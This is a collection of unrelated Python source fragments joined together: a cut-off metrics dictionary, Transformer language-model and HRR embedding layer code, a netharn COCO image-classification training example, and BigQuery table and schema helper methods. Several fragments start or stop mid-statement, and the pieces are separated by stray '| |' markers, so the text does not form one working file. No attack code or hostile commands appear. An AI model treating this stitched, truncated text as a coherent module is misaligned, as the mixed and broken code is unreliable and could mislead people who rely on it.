'tnr' : np.array([0.77, 0.91, 0.78, 0.84]),
'fnr' : np.array([0.33, 0.16, 0.50, 0.17]),
'prv' : np.array([0.33, 0.33, 0.33, 0.33]),
'ppv' : np.array([0.66, 0.66, 0.50, 0.88]),
'fdr' : np.array([0.33, 0.33, 0.50, 0.11]),
'for' : np.array([0.16, 0.11, 0.22, 0.11]),
'npv' : np.array([0.83, 0.88, 0.77, 0.88]),
'plr' : np.array([2.00, 4.00, | |
layer params.')
p.Define(
'model_dim', 512, 'Model dimension that applies to embedding '
'layers and all Transformer layers.')
p.Define('num_trans_layers', 6, 'Number of Transformer layers.')
p.Define('trans_tpl', layers_with_attention.TransformerLayer.Params(),
'Transformer Layer params.')
p.Define('input_dropout_prob', 0.0, 'Prob at which we do input dropout.')
p.Define(
'residual_dropout_prob', 0.0, 'Dropout prob to the output of '
'each sub-layer before it is added to the sub-layer input.')
p.Define(
'atten_dropout_prob', 0.0, 'Dropout prob to the attention '
'weights in each Transformer attention sub-layer.')
p.Define(
'relu_dropout_prob', 0.0, 'Dropout prob to the inner layer '
'output (ReLU activation) in each Transformer feed-forward '
'sub-layer.')
p.Define('softmax', layers.SimpleFullSoftmax.Params(),
'The softmax layer params.')
# Default config for the transformer layers.
p.trans_tpl.is_decoder = False
p.trans_tpl.mask_self_atten = True
p.trans_tpl.tr_atten_tpl.num_attention_heads = 8
p.trans_tpl.tr_atten_tpl.atten_tpl.enable_ctx_pre_proj = True
p.trans_tpl.tr_atten_tpl.atten_tpl.enable_ctx_post_proj = True
p.trans_tpl.tr_fflayer_tpl.hidden_dim = 2048
return p
@base_layer.initializer
def __init__(self, params):
super(TransformerLmNoEmbedding, self).__init__(params)
p = self.params
p.trans_tpl.tr_atten_tpl.residual_dropout_prob = p.residual_dropout_prob
p.trans_tpl.tr_atten_tpl.atten_dropout_prob = p.atten_dropout_prob
p.trans_tpl.tr_fflayer_tpl.residual_dropout_prob = p.residual_dropout_prob
p.trans_tpl.tr_fflayer_tpl.relu_dropout_prob = p.relu_dropout_prob
with tf.variable_scope(p.name):
p.position_emb.embedding_dim = p.model_dim
self.CreateChild('position_emb', p.position_emb)
dropout_tpl = layers.DropoutLayer.Params().Set(
keep_prob=(1.0 - p.input_dropout_prob))
self.CreateChild('input_dropout', dropout_tpl)
params_trans_layers = []
for i in range(p.num_trans_layers):
params = p.trans_tpl.Copy()
params.source_dim = p.model_dim
params.name = 'layer_%d' % i
params_trans_layers.append(params)
self.CreateChildren('trans', params_trans_layers)
p.softmax.input_dim = p.model_dim
p.softmax.num_classes = p.vocab_size
self.CreateChild('softmax', p.softmax)
def zero_state(self, batch_size):
p = self.params
return py_utils.NestedMap({
'layer_%d' % layer: py_utils.NestedMap({
'key': tf.zeros([batch_size, 0, p.model_dim]),
'value': tf.zeros([batch_size, 0, p.model_dim]),
}) for layer in range(p.num_trans_layers)
})
@classmethod
def StepOutputDimension(cls, params):
return py_utils.NestedMap(
logits=params.vocab_size, last_hidden=params.softmax.input_dim)
def Step(self, theta, inputs, paddings, state0, *args, **kwargs):
"""FProp one step.
Args:
theta: A `.NestedMap` object containing weights' values of this
layer and its children layers.
inputs: a tensor of shape [batch, model_dim].
paddings: a 0/1 tensor of shape [batch]. Unused here.
state0: A `.NestedMap` containing the prefix states up to step t-1.
*args: optional extra arguments.
**kwargs: optional extra keyword arguments.
Returns:
A tuple (output, state1).
output: A `.NestedMap` with fields.
logits:
[batch, vocab_size].
last_hidden:
[batch, model_dims].
state1:
The updated prefix states including step t.
"""
_, prefix_len = py_utils.GetShape(state0['layer_0'].key, 2)
# [1, model_dim]
posit_embs = self.position_emb.FProp(theta.position_emb,
prefix_len + 1)[-1:, :]
# [batch, model_dim]
input_embs = inputs + posit_embs
input_embs = self.input_dropout.FProp(theta.input_dropout, input_embs)
# Make a copy of the input.
state1 = state0.Pack(state0.Flatten())
layer_in = input_embs
for i, (layer, layer_theta) in enumerate(zip(self.trans, theta.trans)):
layer_prefix_states = state0['layer_%i' % i]
# [batch, model_dim]
layer_out, _, updated_prefix_states = layer.ExtendStep(
layer_theta, layer_in, layer_prefix_states)
state1['layer_%i' % i] = updated_prefix_states
layer_in = layer_out
# [batch, vocab_size]
logits = self.softmax.Logits(theta=theta.softmax, inputs=layer_out)
output = py_utils.NestedMap(logits=logits, last_hidden=layer_out)
return output, state1
def FProp(self, theta, inputs, paddings, state0=None, labels=None):
"""Computes xent loss given the language model input activations.
Args:
theta: A `.NestedMap` object containing weights' values of this
layer and its children layers.
inputs: Input activation. A tensor of shape [time, batch, model_dim].
paddings: A 0/1 tensor of shape [time, batch].
state0: Not used for Transformer.
labels: If not None, a `.NestedMap` containing the following fields:
- class_weights, a tensor with shape [time, batch] containing the
weights for each target word.
- class_ids, a tensor with shape [time, batch] of int32 dtype containing
the target class labels.
- class_probabilities, a tensor with shape [time, batch, vocab_size] of
float values indicating class-membership probabilities.
Returns:
If `labels` is not None, returns (xent_output, None), where
`xent_output` is a `.NestedMap` as defined by `SoftmaxLayer`'s return
value. Otherwise, `xent_output` only contains the softmax logits.
"""
p = self.params
inputs = py_utils.HasRank(inputs, 3)
seqlen, batch, _ = tf.unstack(tf.shape(inputs), num=3)
inputs = py_utils.HasShape(inputs, [seqlen, batch, p.model_dim])
paddings = py_utils.HasShape(paddings, [seqlen, batch])
# [time, 1, model_dim]
posit_embs = tf.expand_dims(
self.position_emb.FProp(theta.position_emb, seqlen), 1)
# [time, batch, model_dim]
input_embs = inputs + posit_embs
input_embs = self.input_dropout.FProp(theta.input_dropout, input_embs)
layer_in = input_embs
for layer, layer_theta in zip(self.trans, theta.trans):
# [time, batch, model_dim]
layer_out, _ = layer.FProp(layer_theta, layer_in, paddings)
layer_in = layer_out
if labels is None:
# We can only compute the logits here.
logits = self.softmax.Logits(
theta=theta.softmax,
inputs=tf.reshape(layer_out, [seqlen * batch, -1]))
xent_output = py_utils.NestedMap(
logits=tf.reshape(logits, [seqlen, batch, -1]))
elif 'class_ids' in labels:
xent_output = self.softmax.FProp(
theta=theta.softmax,
inputs=layer_out,
class_weights=labels.class_weights,
class_ids=labels.class_ids)
else:
assert 'class_probabilities' in labels
xent_output = self.softmax.FProp(
theta=theta.softmax,
inputs=layer_out,
class_weights=labels.class_weights,
class_probabilities=labels.class_probabilities)
xent_output.last_hidden = layer_out
return xent_output, None
class TransformerLm(TransformerLmNoEmbedding):
"""Stacked RNN based language model layer."""
@classmethod
def Params(cls):
p = super(TransformerLm, cls).Params()
p.Define('emb', layers.EmbeddingLayer.Params(),
'The embedding layer params.')
p.emb.max_num_shards = 1
return p
@classmethod
def CommonParams(cls,
model_dim,
hidden_dim,
num_heads,
num_layers,
learning_rate,
warmup_steps,
vocab_size,
input_dropout_prob=0.0,
residual_dropout_prob=0.1,
atten_dropout_prob=0.0,
relu_dropout_prob=0.0,
softmax_max_alloc=None):
"""Common setup for Transformer language models.
Args:
model_dim: model dimension.
hidden_dim: hidden dimension of feed-forward inner layer.
num_heads: number of attention heads.
num_layers: number of layers in the transformer LM.
learning_rate: learning rate.
warmup_steps: warmup steps for TransformerLearningRateSchedule.
vocab_size: vocab size.
input_dropout_prob: dropout prob to the sums of the token embeddings and
the position embeddings.
residual_dropout_prob: dropout prob to the output of each sub-layer before
it is added to the sub-layer input.
atten_dropout_prob: dropout prob to the attention weights in each
Transformer attention sub-layer.
relu_dropout_prob: dropout prob to the inner layer output (ReLU
activation) in each Transformer feed-forward sub-layer.
softmax_max_alloc: If set to a positive integer the soft-max
computation is chunked into allocations of at most
softmax_max_alloc; when left to its default value of None no
chunking is done.
Returns:
A Params object containing the parameters that set up a Transformer LM.
"""
p = cls.Params()
p.name = 'transformerlm'
p.model_dim = model_dim
p.vocab_size = vocab_size
p.num_trans_layers = num_layers
p.input_dropout_prob = input_dropout_prob
p.residual_dropout_prob = residual_dropout_prob
p.atten_dropout_prob = atten_dropout_prob
p.relu_dropout_prob = relu_dropout_prob
default_params_init = py_utils.WeightInit.Xavier(1.0)
emb_params_init = py_utils.WeightInit.Gaussian(1.0 / math.sqrt(p.model_dim))
p.emb.Set(
vocab_size=vocab_size,
embedding_dim=p.model_dim,
max_num_shards=16,
params_init=emb_params_init,
scale_sqrt_depth=True)
p.position_emb.Set(embedding_dim=p.model_dim, trainable_scaling=False)
p.trans_tpl.is_decoder = False
p.trans_tpl.mask_self_atten = True
p.trans_tpl.tr_atten_tpl.Set(
num_attention_heads=num_heads, params_init=default_params_init)
p.trans_tpl.tr_atten_tpl.atten_tpl.Set(
enable_ctx_pre_proj=True, enable_ctx_post_proj=True)
p.trans_tpl.tr_fflayer_tpl.Set(
hidden_dim=hidden_dim, params_init=default_params_init)
p.softmax.Set(
num_classes=vocab_size, num_shards=16, params_init=emb_params_init)
if softmax_max_alloc:
# If the vocab is very large, computes the softmax chunk-by-chunk.
p.softmax.chunk_size = max(1, int(softmax_max_alloc / vocab_size))
return p
@base_layer.initializer
def __init__(self, params):
super(TransformerLm, self).__init__(params)
p = self.params
assert p.emb.vocab_size == p.vocab_size, ('{} vs. {}'.format(
p.emb.vocab_size, p.vocab_size))
assert p.emb.embedding_dim == p.position_emb.embedding_dim, (
'{} vs. {}'.format(p.emb.embedding_dim, p.position_emb.embedding_dim))
assert p.emb.embedding_dim == p.model_dim, ('{} vs. {}'.format(
p.emb.embedding_dim, p.model_dim))
with tf.variable_scope(p.name):
self.CreateChild('emb', p.emb)
def FProp(self, theta, inputs, paddings, state0=None, labels=None):
"""Computes xent loss given the language model input activations.
Args:
theta: A `.NestedMap` object containing weights' values of this
layer and its children layers.
inputs: Input ids. An int32 tensor of shape [time, batch].
paddings: A 0/1 tensor of shape [time, batch].
state0: Not used for Transformer.
labels: If not None, a `.NestedMap` containing the following fields:
- class_weights, a tensor with shape [time, batch] containing the
weights for each target word.
- class_ids, a tensor with shape [time, batch] of int32 dtype containing
the target class labels.
- class_probabilities, a tensor with shape [time, batch, vocab_size] of
float values indicating class-membership probabilities.
Returns:
If `labels` is not None, returns (xent_output, state1), where
`xent_output` is a `.NestedMap` as defined by `SoftmaxLayer`'s return
value and `state1` is the next recurrent state. Otherwise,
`xent_output` only contains the softmax logits.
"""
ids = py_utils.HasRank(inputs, 2)
paddings = py_utils.HasShape(paddings, tf.shape(ids))
activation = self.emb.EmbLookup(theta.emb, ids)
return super(TransformerLm, self).FProp(
theta, activation, paddings, labels=labels)
class HRREmbeddingLayer(base_layer.BaseLayer):
"""HRR embedding layer"""
@classmethod
def Params(cls):
p = super(HRREmbeddingLayer, cls).Params()
p.Define('embedding_dim', 0, 'Embedding size')
p.Define('num_roles', 0, 'Number of different roles (n)')
# TODO(jmluo)
# might want to use different m values for different roles.
p.Define('num_fillers_per_role', 20,
'Number of different fillers for each role (m)')
p.Define('e_l', layers.EmbeddingLayer.Params(), 'Lexicalized embedding')
# note that s is used num_roles times
p.Define('s', layers.EmbeddingLayer.Params(), 'Signature embedding')
# p.Define('rs', layers.EmbeddingLayer.Params(), 'Role signature')
p.Define('mode', 'basic', 'Modes')
p.Define('merge', False, 'Flag to merge all collections of filler matrices into a big one')
p.Define('lazy', True, 'Flag to merge all collections of filler matrices into a big one')
# TODO(jmluo)
p.Define('vocab_size', 0, 'Vocabulary size')
p.Define('actual_shards', -1, 'Actual number of shards used. This should not be specified, but computed during __init__ call')
p.Define('trainable_basis', True, 'trainable basis embeddings')
return p
@base_layer.initializer
def __init__(self, params):
super(HRREmbeddingLayer, self).__init__(params)
p = self.params
assert p.embedding_dim > 0
assert p.num_roles > 0
assert p.num_fillers_per_role > 0
assert p.vocab_size > | |
<gh_stars>1-10
# -*- coding: utf-8 -*-
"""
This is a simple generalized harness for training a classifier on a coco dataset.
Given a COCO-style dataset data (you can create a sample coco dataset using the
kwcoco CLI), this module trains a classifier on chipped regions denoted by the
coco annotations. These chips are cropped from the image and resized to the
specified ``input_dims``. The default network architecture is resnet50. Other
settings like augmentation, learning rate, batch size, etc can all be specified
via the command line, a config file, or a Python dictionary (see
:class:`ClfConfig` for all available arguments).
For details see the other docstrings in this file and / or try running
yourself.
.. code-block:: bash
# Install netharn
# pip3 install netharn # TODO: uncomment once 0.5.7 is live
pip3 install git+https://gitlab.kitware.com/computer-vision/netharn.git@dev/0.5.7
# Install kwcoco and autogenerate a image toy datasets
pip3 install kwcoco
kwcoco toydata --dst ./toydata_train.json --key shapes1024
kwcoco toydata --dst ./toydata_vali.json --key shapes128 # optional
kwcoco toydata --dst ./toydata_test.json --key shapes256 # optional
# Train a classifier on your dataset
python3 -m netharn.examples.classification \
--name="My Classification Example" \
--train_dataset=./toydata_train.json \
--vali_dataset=./toydata_vali.json \
--test_dataset=./toydata_test.json \
--workdir=$HOME/work/netharn \
--input_dims=224,244 \
--batch_size=32 \
--max_epoch=100 \
--patience=40 \
--xpu=gpu0 \
--schedule=ReduceLROnPlateau-p10-c10 \
--augmenter=medium \
--lr=1e-3
Equivalently you could call this via python
.. code-block:: python
from netharn.examples.classification import setup_harn
kwargs = {
'name': 'My Classification Example',
'train_dataset': './toydata_train.json',
'vali_dataset': './toydata_vali.json',
'workdir': '$HOME/work/netharn',
'input_dims': (224, 244),
'batch_size': 32,
'max_epoch': 100,
'patience': 40,
'xpu': 'auto',
'schedule': 'ReduceLROnPlateau-p10-c10',
'augmenter': 'medium',
'lr': 1e-3,
}
harn = setup_harn(**kwargs)
harn.run()
# TODO: describe what the output of this should look like.
"""
from __future__ import absolute_import, division, print_function, unicode_literals
from os.path import join
import numpy as np
import sys
import torch
import ubelt as ub
import netharn as nh
import kwarray
import scriptconfig as scfg
from netharn.data.channel_spec import ChannelSpec
class ClfConfig(scfg.Config):
"""
This is the default configuration for running the classification example.
Instances of this class behave like a dictionary. However, they can also be
specified on the command line, via kwargs, or by pointing to a YAML/json
file. See :module:``scriptconfig`` for details of how to use
:class:`scriptconfig.Config` objects.
"""
default = {
'name': scfg.Value('clf_example', help='A human readable tag that is "name" for humans'),
'workdir': scfg.Path('~/work/netharn', help='Dump all results in your workdir'),
'workers': scfg.Value(2, help='number of parallel dataloading jobs'),
'xpu': scfg.Value('auto', help='See netharn.XPU for details. can be auto/cpu/xpu/cuda0/0,1,2,3)'),
'datasets': scfg.Value('special:shapes256', help='Either a special key or a coco file'),
'train_dataset': scfg.Value(None),
'vali_dataset': scfg.Value(None),
'test_dataset': scfg.Value(None),
'sampler_backend': scfg.Value(None, help='ndsampler backend'),
'channels': scfg.Value('rgb', help='special channel code. See ChannelSpec'),
'arch': scfg.Value('resnet50', help='Network architecture code'),
'optim': scfg.Value('adam', help='Weight optimizer. Can be SGD, ADAM, ADAMW, etc..'),
'input_dims': scfg.Value((224, 224), help='Window size to input to the network'),
'normalize_inputs': scfg.Value(True, help=(
'if True, precompute training mean and std for data whitening')),
'balance': scfg.Value(None, help='balance strategy. Can be category or None'),
'augmenter': scfg.Value('simple', help='type of training dataset augmentation'),
'batch_size': scfg.Value(3, help='number of items per batch'),
'num_batches': scfg.Value('auto', help='Number of batches per epoch (mainly for balanced batch sampling)'),
'max_epoch': scfg.Value(140, help='Maximum number of epochs'),
'patience': scfg.Value(140, help='Maximum "bad" validation epochs before early stopping'),
'lr': scfg.Value(1e-4, help='Base learning rate'),
'decay': scfg.Value(1e-5, help='Base weight decay'),
'schedule': scfg.Value(
'step90-120', help=(
'Special coercible netharn code. Eg: onecycle50, step50, gamma, ReduceLROnPlateau-p10-c10')),
'init': scfg.Value('noop', help='How to initialized weights: e.g. noop, kaiming_normal, path-to-a-pretrained-model)'),
'pretrained': scfg.Path(help=('alternative way to specify a path to a pretrained model')),
}
def normalize(self):
if self['pretrained'] in ['null', 'None']:
self['pretrained'] = None
if self['pretrained'] is not None:
self['init'] = 'pretrained'
class ClfModel(nh.layers.Module):
"""
A simple pytorch classification model.
Note what I consider as "reproducibility" conventions present in this
model:
(1) classes can be specified as a list of class names (or
technically anything that is :class:`ndsampler.CategoryTree`
coercible). This helps anyone with your pretrained model to
understand what its predicting.
(2) The expected input channels are specified, as a
:class:`netharn.data.ChannelSpec` coercible (e.g. a number, a
code like "rgb" or "rgb|disparity", or a dict like structure)
# TODO: properly define the dict structure, for now just use
# strings.
(3) The input statistics are specified as a dict and applied at runtime
{
'mean': <tensor to subtract>,
'std': <tensor to divide by>,
}
This means you don't have to remember these values when loading
data at test time, the network remembers them instead.
# TODO: this has to be better rectified with channel specifications
# for now assume only one early fused stream like rgb.
(4) The inputs and outputs to the network are dictionaries with
keys hinting at the proper interpretation of the values.
The inputs provide a mapping from channel spec keys to early-fused
tensors, which can be used in specific ways (e.g. to connect input
rgb and disparity signals into late fused network components).
The outputs provide a mapping to whatever type of output you want
to provide. DONT JUST RETURN A SOMETIMES TUPLE OF LOSS AND OUTPUTS
IN SOME RANDOM FORMAT! Instead if your network sometimes returns
loss then sometimes add the value ``outputs['loss'] = <your
loss>``. And maybe you do some decoding of the outputs to
probabilities, in that case add the value ``outputs['class_probs']
= <class-probs>``. Or maybe you return the logits, so return
``outputs['class_logits'``. This is far easier to use than
returning tuples of data. </rant over>
(5) A coder that performs postprocessing on batch outputs to
obtain a useable form for the predictions.
Example:
>>> from netharn.examples.classification import * # NOQA
>>> classes = ['a', 'b', 'c']
>>> input_stats = {
>>> 'mean': torch.Tensor([[[0.1]], [[0.2]], [[0.2]]]),
>>> 'std': torch.Tensor([[[0.3]], [[0.3]], [[0.3]]]),
>>> }
>>> channels = 'rgb'
>>> self = ClfModel(
>>> arch='resnet50', channels=channels,
>>> input_stats=input_stats, classes=classes)
>>> inputs = torch.rand(4, 1, 256, 256)
>>> outputs = self(inputs)
>>> self.coder.decode_batch(outputs)
"""
def __init__(self, arch='resnet50', classes=1000, channels='rgb',
input_stats=None):
super(ClfModel, self).__init__()
import ndsampler
if input_stats is None:
input_stats = {}
input_norm = nh.layers.InputNorm(**input_stats)
self.classes = ndsampler.CategoryTree.coerce(classes)
self.channels = ChannelSpec.coerce(channels)
chann_norm = self.channels.normalize()
assert len(chann_norm) == 1
in_channels = len(ub.peek(chann_norm.values()))
num_classes = len(self.classes)
if arch == 'resnet50':
from torchvision import models
model = models.resnet50()
new_conv1 = torch.nn.Conv2d(in_channels, 64, kernel_size=7,
stride=3, padding=3, bias=False)
new_fc = torch.nn.Linear(2048, num_classes, bias=True)
new_conv1.weight.data[:, 0:in_channels, :, :] = model.conv1.weight.data[0:, 0:in_channels, :, :]
new_fc.weight.data[0:num_classes, :] = model.fc.weight.data[0:num_classes, :]
new_fc.bias.data[0:num_classes] = model.fc.bias.data[0:num_classes]
model.fc = new_fc
model.conv1 = new_conv1
else:
raise KeyError(arch)
self.input_norm = input_norm
self.model = model
self.coder = ClfCoder(self.classes)
def forward(self, inputs):
"""
Args:
inputs (Tensor | dict): Either the input images (as a regulary
pytorch BxCxHxW Tensor) or a dictionary mapping input
modalities to the input imges.
Returns:
Dict[str, Tensor]: model output wrapped in a dictionary so its
clear what the return type is. In this case "energy" is class
probabilities **before** softmax / normalization is applied.
"""
if isinstance(inputs, dict):
# TODO: handle channel modalities later
assert len(inputs) == 1, (
'only support one fused stream: e.g. rgb for now ')
im = ub.peek(inputs.values())
else:
im = inputs
im = self.input_norm(im)
class_energy = self.model(im)
outputs = {
'class_energy': class_energy,
}
return outputs
class ClfCoder(object):
"""
The coder take the output of the classifier and transforms it into a
standard format. Currently there is no standard "classification" format
that I use other than a dictionary with special keys.
"""
def __init__(self, classes):
self.classes = classes
def decode_batch(self, outputs):
class_energy = outputs['class_energy']
class_probs = self.classes.hierarchical_softmax(class_energy, dim=1)
pred_cxs, pred_conf = self.classes.decision(
class_probs, dim=1, thresh=0.1,
criterion='entropy',
)
decoded = {
'class_probs': class_probs,
'pred_cxs': pred_cxs,
'pred_conf': pred_conf,
}
return decoded
class ClfDataset(torch.utils.data.Dataset):
"""
Efficient loader for classification training on coco samplers.
This is a normal torch dataset that uses :module:`ndsampler` and
:module:`imgaug` for data loading an augmentation.
It also contains a ``make_loader`` method for creating a class balanced
DataLoader. There is little netharn-specific about this class.
Example:
>>> from netharn.examples.classification import * # NOQA
>>> import ndsampler
>>> sampler = ndsampler.CocoSampler.demo()
>>> self = ClfDataset(sampler)
>>> index = 0
>>> self[index]['inputs']['rgb'].shape
>>> loader = self.make_loader(batch_size=8, shuffle=True, num_workers=0, num_batches=10)
>>> for batch in ub.ProgIter(iter(loader), total=len(loader)):
>>> break
>>> print('batch = {}'.format(ub.repr2(batch, nl=1)))
>>> # xdoctest: +REQUIRES(--show)
>>> import kwplot
| |
ID.
dataset_id (string): BigQuery dataset ID.
project_id (string): BigQuery project ID.
Returns:
list of clustering fields is the table has cluster fields, None otherwise.
"""
table_ref = self.get_table_ref(dataset_id, table_id, project_id=project_id)
clustering_fields = self.client.get_table(table_ref).clustering_fields
return clustering_fields
def identify_new_fields(self, table_id, schema_path, dataset_id=bq_default_dataset(),project_id=bq_default_project()):
""" Identify new fields in based on a schema file.
Parameters:
table_id (string): BigQuery table ID.
dataset_id (string): BigQuery dataset ID.
project_id (string): BigQuery project ID.
schema_path (string): Path to the schema to compare to.
Returns:
List of new fields.
"""
list_field = []
schema_a = self.get_table_schema(
table_id=table_id,
dataset_id=dataset_id,
project_id=project_id
)
schema_b = read_table_schema_from_file(schema_path)
field_list_a = [schema_field.name for schema_field in schema_a]
for schema_field in schema_b:
if schema_field.name not in field_list_a:
list_field.append(schema_field)
return list_field
def append_field(self, table_id, field, dataset_id=bq_default_dataset(),project_id=bq_default_project()):
""" Append fields to a BigQuery table.
Parameters:
table_id (string): BigQuery table ID.
dataset_id (string): BigQuery dataset ID.
project_id (string): BigQuery project ID.
field (string): Schema field object.
"""
table_ref = self.get_table_ref(dataset_id, table_id,project_id=project_id)
table = self.client.get_table(table_ref) # API request
original_schema = table.schema
new_schema = original_schema[:] # creates a copy of the schema
new_schema.append(field)
table.schema = new_schema
table = self.client.update_table(table, ["schema"]) # API request
assert len(table.schema) == len(original_schema) + 1 == len(new_schema)
return 0
def apply_patch(self, table_id, schema_path, dataset_id=bq_default_dataset(),project_id=bq_default_project()):
""" Apply a patch to a BigQuery Table if required.
Parameters:
table_id (string): BigQuery table ID.
dataset_id (string): BigQuery dataset ID.
project_id (string): BigQuery project ID.
schema_path (string): Path to schema file to compare to.
Returns:
Lenght of new schema
"""
logging.info("Attempting patch")
logging.info("Checking for new fields...")
new_fields = self.identify_new_fields(
table_id=table_id,
schema_path=schema_path,
project_id=project_id,
dataset_id=dataset_id
)
if new_fields != []:
logging.info("New fields to be added:")
logging.info(new_fields)
for field in new_fields:
self.append_field(
field=field,
table_id=table_id,
dataset_id=dataset_id,
project_id=project_id
)
logging.info("Done!")
else:
logging.info("No field to be added")
logging.info("Checking for schema update...")
self.update_schema(
table_id=table_id,
schema_path=schema_path,
dataset_id=dataset_id,
project_id=project_id
)
return len(
self.get_table_schema(
table_id=table_id,
dataset_id=dataset_id,
project_id=project_id
)
)
def update_schema(self, table_id, schema_path, dataset_id=bq_default_dataset(),project_id=bq_default_project()):
""" Perform a schema update. Used to update descriptions.
Parameters:
table_id (string): BigQuery table ID.
dataset_id (string): BigQuery dataset ID.
project_id (string): BigQuery project ID.
schema_path (string): Path to schema file to compare to.
Raises:
BadRequest if the update fails.
"""
table_ref = self.get_table_ref(dataset_id, table_id,project_id = project_id)
table = self.client.get_table(table_ref) # API request
new_schema = read_table_schema_from_file(schema_path)
if table.schema == new_schema:
logging.info("No changes needed")
else:
assert len(table.schema) == len(new_schema)
table.schema = new_schema
try:
table = self.client.update_table(table, ["schema"]) # API request
return 0
except exceptions.BadRequest as error:
raise error
def update_table_description(
self,
table_id,
description,
project_id=bq_default_project(),
dataset_id=bq_default_dataset()
):
""" Performs a table update to fill in description for the table.
Parameters:
table_id (string): BigQuery table ID.
description (string): The descriptive text to describe the content of the table.
project_id (string): BigQuery project ID.
dataset_id (string): BigQuery dataset ID.
Raises:
BadRequest if the update fails.
"""
table_ref = self.get_table_ref(dataset_id=dataset_id, table_id=table_id, project_id=project_id)
table = self.client.get_table(table_ref) # API request
if table.description == description:
logging.info("No changes to table description required")
else:
try:
table.description = description
self.client.update_table(table, ["description"]) # API request
except exceptions.BadRequest as error:
raise error
def execute_sql(self, sql, project_id=bq_default_project(), dialect='standard'):
""" Executes a SQL query and loads it as a DataFrame.
Parameters:
sql (string): SQL Query.
project_id (string): BigQuery Project ID.
dialect (string): BigQuery dialect. Defaults to standard.
Returns:
Query result as a DataFrame.
"""
data = pd.read_gbq(
sql,
project_id=project_id,
credentials=self.credentials,
dialect=dialect
)
return data
def execute_dml(self, sql=None, file=None, location='US', project=bq_default_project()):
job_config = bigquery.QueryJobConfig()
try:
sql = sql if sql else read_sql(file)
job = self.client.query(sql, location=location, job_config=job_config)
results = job.result()
logging.info("%s - %s - %s rows effected (%s elapsed, %s B processed)",
job.statement_type,
job.state,
job.num_dml_affected_rows,
job.ended - job.started,
job.total_bytes_processed
)
except Exception as e:
logging.error(e)
raise e
return
def execute_file(self, file, project_id=bq_default_project(),
dialect='standard', *args, **kwargs):
""" Executes a SQL file and loads it as a DataFrame.
Parameters:
file (string): Path to SQL file.
project_id (string): BigQuery Project ID.
dialect (string): BigQuery dialect. Defaults to standard.
**kwargs can be passed if the SQL file contains arguments formatted with {}.
Forbidden kwargs:
partition_date
Returns:
Query result as a DataFrame.
"""
sql = read_sql(file, *args, **kwargs)
data = self.execute_sql(
sql=sql,
project_id=project_id,
dialect=dialect
)
return data
def load_dataframe(self, df, table_id, dataset_id=bq_default_dataset(),project_id=bq_default_project(), schema_path='', write_disposition="WRITE_TRUNCATE"):
""" Loads DataFrame to BigQuery table.
Parameters:
df (pd.DataFrame): Pandas DataFrame
table_id (string): BigQuery table ID.
dataset_id (string): BigQuery dataset ID.
project_id (string): BigQuery project ID.
schema_path (string): Path to schema file.
write_disposition (string): Write disposition. Can be one of WRITE_TRUNCATE, WRITE_APPEND or WRITE_EMPTY.
"""
if schema_path != '':
self.initiate_table(
table_id=table_id,
dataset_id=dataset_id,
project_id=project_id,
schema_path=schema_path
)
schema = read_table_schema_from_file(schema_path)
else:
schema = None
data = df.rename(columns=lambda cname: cname.replace('.', '_'))
table_ref = self.get_table_ref(dataset_id, table_id,project_id=project_id)
job_config = bigquery.LoadJobConfig(schema=schema)
job_config.write_disposition = set_write_disposition(write_disposition)
job = self.client.load_table_from_dataframe(
data,
table_ref,
job_config=job_config
)
job.result()
def create_gs_table(self,
table_id,
dataset_id=bq_default_dataset(),
project_id=bq_default_project(),
schema_path='',
googlesheet_uri=None,
googlesheet_key=None,
sheet_name=None,
header=True):
""" Creates BigQuery Table with live connection to Google Sheets
Args:
table_id (str): BigQuery table ID
dataset_id (str): BigQuery dataset ID
project_id (str): BigQuery project ID
schema_path (str): Path to schema file, if not set then BQ will auto-detect
googlesheet_uri (str): Google Sheet URI
googlesheet_key (str): Google Sheet Key, an alternate option instead of URI
sheet_name (str): GS Sheet Name, defaults to first worksheet, index 0
header (bool): Defaults to True
"""
if googlesheet_uri is None:
if googlesheet_key is None:
raise BigQueryExecutorError("A googlesheet_uri or googlesheet_key must be provided")
else:
googlesheet_uri = f"https://docs.google.com/spreadsheets/d/{googlesheet_key}"
external_config = bigquery.ExternalConfig("GOOGLE_SHEETS")
external_config.source_uris = [googlesheet_uri]
if sheet_name:
external_config.options.range = (sheet_name)
if header:
external_config.options.skip_leading_rows = 1
if schema_path != '':
schema = read_table_schema_from_file(schema_path)
else:
schema = None
external_config.autodetect = True
gs_table = bigquery.Table(
self.get_table_ref(
project_id=project_id,
dataset_id=dataset_id,
table_id=table_id
),
schema=schema
)
gs_table.external_data_configuration=external_config
try:
self.client.delete_table(gs_table, not_found_ok=True)
self.client.create_table(gs_table)
logging.info(
f"Created table {project_id}:{dataset_id}.{table_id} with live connection to {googlesheet_uri}"
)
except exceptions.Conflict as error:
logging.error(error)
raise error
def load_google_sheet(self,
table_id,
dataset_id=bq_default_dataset(),
project_id=bq_default_project(),
schema_path='',
googlesheet_key=None,
googlesheet_uri=None,
sheet_name=None,
description=None,
header=True,
write_disposition='WRITE_TRUNCATE'):
""" Loads Google Sheets data into a normal BigQuery Table
Args:
table_id (str): BigQuery table ID
dataset_id (str): BigQuery dataset ID
project_id (str): BigQuery project ID
schema_path (str): Path to schema file, if not set then BQ will auto-detect
googlesheet_uri (str): Google Sheet URI
googlesheet_key (str): Google Sheet Key, an alternate option instead of URI
sheet_name (str): GS Sheet Name, defaults to first worksheet, index 0
description (str): The descriptive text to describe the content of the table
header (bool): Defaults to True
write_disposition (str): Write disposition. Can be one of WRITE_TRUNCATE, WRITE_APPEND or WRITE_EMPTY
"""
temp_table_id=f"temp_gs__{table_id}"
try:
self.create_gs_table(
table_id=temp_table_id,
dataset_id=dataset_id,
project_id=project_id,
schema_path=schema_path,
googlesheet_key=googlesheet_key,
googlesheet_uri=googlesheet_uri,
sheet_name=sheet_name,
header=header
)
self.create_table(
project_id=project_id,
dataset_id=dataset_id,
table_id=table_id,
schema_path=schema_path,
write_disposition=write_disposition,
description=description,
sql=f"SELECT * FROM `{project_id}.{dataset_id}.{temp_table_id}`"
)
except Exception as error:
logging.error(error)
raise error
finally:
if self.table_exists(dataset_id=dataset_id, table_id=temp_table_id):
self.delete_table(dataset_id=dataset_id, table_id=temp_table_id)
def load_json_file(self, file, table_id, dataset_id=bq_default_dataset(),project_id=bq_default_project(), schema_path='', write_disposition="WRITE_TRUNCATE"):
""" Loads JSON file to BigQuery table.
Parameters:
file (string): Path to JSON file.
project_id (string): BigQuery Project ID.
table_id (string): BigQuery table ID.
dataset_id (string): BigQuery dataset ID.
project_id (string): BigQuery project ID.
schema_path (string): Path to schema file.
